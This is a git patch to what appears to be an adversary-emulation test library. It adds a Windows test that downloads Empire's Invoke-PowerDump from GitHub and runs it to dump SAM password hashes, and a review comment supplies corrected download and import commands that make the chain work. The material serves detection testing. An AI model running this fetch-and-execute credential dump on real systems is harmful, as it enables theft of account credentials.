From f4d059dbbcc7310a19728fa241d43ec11ec2a4d3 Mon Sep 17 00:00:00 2001
From: Jesse Moore
Date: Sat, 15 Aug 2020 20:31:19 -0600
Subject: [PATCH] Update T1003.002.yaml for PowerDump (#1196)

* Update T1003.002.yaml for PowerDump

Added PowerDump to parse SAM and SYSTEM for usernames and Hash

* Add fixes

Updated with fixes. Its not erroring with Multiple cleanup Removed preReqs, don't need them Removed SAM and SYSTEM file dep... PowerDump can just Dump Registry for Hashes and Usernames

* Getting permanent links to file

Added permanent link to PowerDump in BC-SECURITY Github

* updated description

Co-authored-by: Carrie Roberts
---
 atomics/T1003.002/T1003.002.yaml | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index ae3312a1..5ba30d65 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -78,4 +78,18 @@ atomic_tests:
       del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
     name: command_prompt
   elevation_required: true
-
\ No newline at end of file
+
+- name: PowerDump Registry dump of SAM for hashes and usernames
+  description: Executes a hashdump by reading the hasshes from the registry.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
+      Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
+      Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+      Import-Module .\PowerDump.ps1
+      Invoke-PowerDump
+    name: powershell
+  elevation_required: true
+
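Review bot: The `Invoke-Webrequest` line in the new executor points at the GitHub `/blob/` HTML page, so `-OutFile` saves a web page rather than the script, and the next line `Import-Module .\PowerDump.ps1` loads from the current directory while the file was written to `$Env:Temp` — as committed the test cannot run. Use the raw content host for the same pinned commit and import from where the file was saved: `Invoke-WebRequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"` followed by `Import-Module "$Env:Temp\PowerDump.ps1"`. The executor also leaves the downloaded script behind in the temp directory; adding `cleanup_command: Remove-Item "$Env:Temp\PowerDump.ps1" -ErrorAction Ignore` under `executor:` restores the host after the run, which matters when a detection team is confirming that only this test produced the observed artifacts. The `Write-Host` banner says it disables Defender real-time monitoring, but nothing in the command does that — reword it to describe the execution-policy change it actually makes so analysts reading test output are not misled, and fix the `hasshes` typo in the description.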